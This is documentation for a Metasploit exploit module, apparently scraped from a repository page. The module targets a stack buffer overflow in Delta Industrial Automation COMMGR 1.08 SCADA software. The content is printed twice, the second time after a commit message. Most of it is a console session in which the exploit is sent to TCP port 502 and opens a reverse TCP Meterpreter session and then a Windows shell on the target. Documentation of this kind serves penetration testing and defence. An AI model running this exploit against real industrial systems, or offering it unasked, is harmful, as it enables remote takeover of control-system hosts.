documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md

## Vulnerable Application

Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.

## Verification Steps

  1. Install Delta Industrial Automation COMMGR 1.08
  2. Start ```msfconsole```
  3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
  4. Do ```set RHOST <target_ip>```
  5. Do ```run```
  6. You should get a shell. :)

## Scenarios

### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1

```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options

Module options (exploit/windows/scada/delta_ia_commgr_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal


msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700

meterpreter > sysinfo
Computer        : TEST01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.3.64 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```
Added exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow. 2018-09-19 15:28:46 +08:00			`## Vulnerable Application`

			`Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.`

			`## Verification Steps`

			`1. Install Delta Industrial Automation COMMGR 1.08`
			2. Start ```msfconsole```
			3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
			4. Do ```set RHOST <target_ip>```
			5. Do ```run```
			`6. You should get a shell. :)`

			`## Scenarios`

			`### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1`

			```
			`msf > use exploit/windows/scada/delta_ia_commgr_bof`
			`msf exploit(windows/scada/delta_ia_commgr_bof) > show options`

			`Module options (exploit/windows/scada/delta_ia_commgr_bof):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`RHOST yes The target address`
			`RPORT 502 yes The target port (TCP)`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 COMMGR 1.08 / Windows Universal`


			`msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64`
			`RHOST => 192.168.3.64`
			`msf exploit(windows/scada/delta_ia_commgr_bof) > run`

			`[*] Started reverse TCP handler on 192.168.3.150:4444`
			`[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...`
			`[*] Sending stage (179779 bytes) to 192.168.3.64`
			`[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700`

			`meterpreter > sysinfo`
			`Computer : TEST01`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter > shell`
			`Process 932 created.`
			`Channel 1 created.`
			`Microsoft Windows [Version 6.1.7601]`
			`Copyright (c) 2009 Microsoft Corporation. All rights reserved.`

			`C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit`
			`exit`
			`meterpreter > exit`
			`[*] Shutting down Meterpreter...`

			`[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit`
			`msf exploit(windows/scada/delta_ia_commgr_bof) >`
			```